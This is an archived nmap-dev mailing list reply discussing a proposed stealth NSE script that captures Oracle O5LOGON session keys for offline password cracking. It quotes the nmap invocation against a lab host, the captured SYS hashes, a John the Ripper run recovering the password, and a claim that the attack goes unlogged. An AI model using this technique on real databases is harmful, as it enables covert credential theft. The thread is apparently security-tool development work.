Re: Script suggestion - oracle

[Richard Miles <richard.k.miles () googlemail com>]

Hi Dhiru

Very nice work.


I have written a NSE script for doing stealth attack against O5LOGON
> protocol. This allows us to brute-force the session key(s) offline. I
> have verified that using this script generates no alerts or logs on
> the Oracle server.

It's really dangerous. Default configutarion? Audit was enabled?

Result of "select os_username, username, userhost, action_name,
> returncode from dba_audit_session where action_name = 'LOGON' and
> username = 'SYS' and returncode > 0 order by timestamp;" query is
> constant when this script is used.

I'm not sure if I understood. Do you believe that this query is generated
because of each attempt that your script execute?

How did you noticed it? It was logged in somewhere?


> ✗ cat ~/passdb
> wrongpassword
>
> ✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args
>
> oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb
> 192.168.2.253 --datadir .

Why do you need to setup a passdb if you should never complete the
authentication? My understanding based on your explanation is that you will
get the data that you need before send password, right?


> Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 13:03 IST
>
> sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
>
> sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3
> Nmap scan report for 192.168.2.253
> Host is up (0.00033s latency).
> PORT     STATE SERVICE
> 1521/tcp open  oracle
> | oracle-brute-stealth:
> |   Accounts
> |     No valid accounts found
> |   Statistics
> |_    Performed 2 guesses in 1 seconds, average tps: 2
>
> Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds


Why is the same account (SYS) printed two times on the output? Do you have
to users called SYS on your userdb file?

Also, why the scrip says that no valid account was found it you obtained
two hashes?

Thanks for your great work.


> ➜  src git:(unstable-jumbo) ✗ cat ~/hashes
>
> sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
>
> sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3
>
> ➜  src git:(unstable-jumbo) ✗ ../run/john ~/hashes
> Loaded 2 password hashes with 2 different salts (Oracle O5LOGON
> protocol [32/64])
> password         (sys)
> password         (sys)
> guesses: 2  time: 0:00:00:00 DONE (Sat Oct  6 13:04:44 2012)  c/s:
> 3772  trying: password
> Use the "--show" option to display all of the cracked passwords reliably
>
> JtR has guessed the correct password although the nmap script tried to
> login with incorrect password (wrongpassword)!
>
> This script is just a PoC. It needs tons of work before it can go in.
> Can a Nmap developer fix and commit it?
>
> --
> Cheers,
> Dhiru
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/